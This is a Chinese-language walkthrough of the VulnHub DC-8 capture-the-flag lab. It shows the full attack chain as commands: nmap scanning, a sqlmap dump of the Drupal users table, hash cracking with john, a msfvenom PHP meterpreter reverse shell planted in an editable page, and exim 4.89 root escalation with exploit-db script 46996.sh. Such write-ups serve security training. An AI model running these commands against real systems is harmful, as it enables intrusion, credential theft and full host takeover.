準備工作
在vulnhub官網下載DC:8靶機DC: 8 ~ VulnHub
匯入到vmware,設定成NAT模式
開啟kali準備進行滲透(ip:192.168.200.6)
資訊收集
利用nmap進行ip埠探測
nmap -sS 192.168.200.6/24
探測到ip為192.168.200.22的靶機,開放了80埠和22埠
再用nmap對所有埠進行探測,確保沒有別的遺漏資訊
nmap -sV -p- 192.168.200.22
開啟80埠檢視,又是熟悉的介面Drupal 框架,但這次是Drupal7
dirsearch掃目錄發現了xmlrpc.php和後臺登陸頁面
觀察了一下頁面,發現有傳參,判斷可能存在注入,下面進行測試
SQL隱碼攻擊
經過測試發現存在sql注入
利用sqlmap進行攻擊,爆出資料庫d7db
sqlmap -u "http://192.168.200.22/?nid=1" --dbs
再找到users表
sqlmap -u "http://192.168.200.22/?nid=1" -D d7db --tables
接著爆列名
sqlmap -u "http://192.168.200.22/?nid=1" -D d7db -T 'users' --columns
最後爆資料
sqlmap -u "http://192.168.200.22/?nid=1" -D d7db -T 'users' -C uid,name,pass --dump
拿到賬號和加密過後的密碼,看樣子像之前DC3的那種加密,用john來爆
john解密
先將密碼儲存下來之後進行爆破,但是隻爆到了一個密碼
登陸了一下發現不是admin的密碼,john登陸進去了
在後臺發現,可以增加頁面,也可以編輯頁面,和dc7的情況差不多
但是增加的頁面不能選擇以php程式碼執行,找了一會發現 編輯contact us頁面可以以php程式碼執行
試了一下phpinfo();發現沒有顯示,可能只是沒有回顯,但程式碼已經儲存了。接下來我利用msf進行後門監聽
msf後門利用
首先先用msfvenom生成後門,然後用後門的程式碼複製到編輯頁面
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.200.6 LPORT=4444 R > test.php
接著開啟msf,輸入命令進行監聽
use exploit/multi/handler //使用handler模組
set PAYLOAD php/meterpreter/reverse_tcp //設定payload
set LHOST 192.168.200.6 //監聽
run
然後返回contact us介面,隨便輸入點東西提交,就返回shell到kali了
許可權提升
拿到webshell之後進行提權
先獲取互動式shell
python -c'import pty;pty.spawn("/bin/bash")'
進行簡單的資訊收集
find / -perm -u=s -type f 2>/dev/null
還使用了linux-exploit-suggester-master指令碼去跑漏洞,沒有發現什麼可利用的許可權提升漏洞,看了wp才注意到exim4這個東西
exim是一款在Unix系統上使用的郵件服務,exim4在使用時具有root許可權。查詢一下關於exim4的漏洞,首先看看版本
exim 4.89
找到了對應版本的本地提權利用指令碼
完整路徑是:/usr/share/exploitdb/exploits/+path中的指令碼路徑
看了下檔案有兩種提權方法,一個是setuid 一個是netcat
在meterpreter會話中將這個檔案上傳到靶機上
upload /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/shell.sh
給指令碼檔案新增執行許可權
chmod +x shell.sh
但無論執行什麼都報錯,查了一下是檔案格式導致的。要想執行46996.sh檔案,需要修改檔案format為unix格式
在kali用vi開啟指令碼修改格式 輸入 :set ff=unix,然後再重新上傳指令碼
使用了第一種方法提權失敗-m setuid
第二種方法-m netcat成功,但是很不穩定,過了一會又變成www-data
可以趁root許可權的時候用nc反彈shell維持穩定
進入root過關
